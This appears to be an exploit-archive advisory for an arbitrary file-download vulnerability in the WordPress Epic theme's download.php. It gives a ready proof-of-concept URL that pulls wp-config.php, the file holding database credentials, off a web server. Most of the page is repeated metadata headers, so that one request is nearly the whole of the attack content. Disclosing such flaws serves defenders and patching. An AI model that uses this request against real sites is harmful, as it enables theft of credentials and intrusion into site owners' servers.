WordPress Theme Epic - 'download.php' Arbitrary File Download
| EKU-ID: 43644 | CVE: | OSVDB-ID: |
| Author: Ashiyane Digital Security Team | Published: 2014-09-08 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 43644 | CVE: | OSVDB-ID: |
| Author: Ashiyane Digital Security Team | Published: 2014-09-08 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/69672/info Epic theme for Wordpress is prone to an arbitrary file-download vulnerability. An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. http://www.example.com/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php